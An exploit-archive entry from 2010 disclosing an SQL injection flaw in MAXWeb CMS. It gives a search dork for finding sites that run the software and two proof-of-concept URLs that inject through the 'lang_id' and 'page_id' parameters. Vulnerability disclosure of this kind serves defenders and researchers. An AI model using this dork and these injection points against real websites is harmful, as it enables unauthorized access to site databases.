id: 13400
date: 07/19/2010
title: MAXWeb CMS (lang_id) SQL Injection Vulnerability
author: CoBRa_21
cves: 

================================================
MAXWeb CMS (lang_id) SQL Injection Vulnerability 
================================================


Author : CoBRa_21

Author Web Page : http://www.ipbul.org

Dork : "Powered by MAXWeb Ltd."

Script Page : http://www.maxweb.co.il/

########################################################################################
 
Sql Injection:

http://localhost/[path]/index.php?lang_id=1' (Sql)

http://localhost/[path]/index.php?lang_id=1&page_id=12' (Sql)

######################################################################################## 



#  0day.today [2023-03-22]  #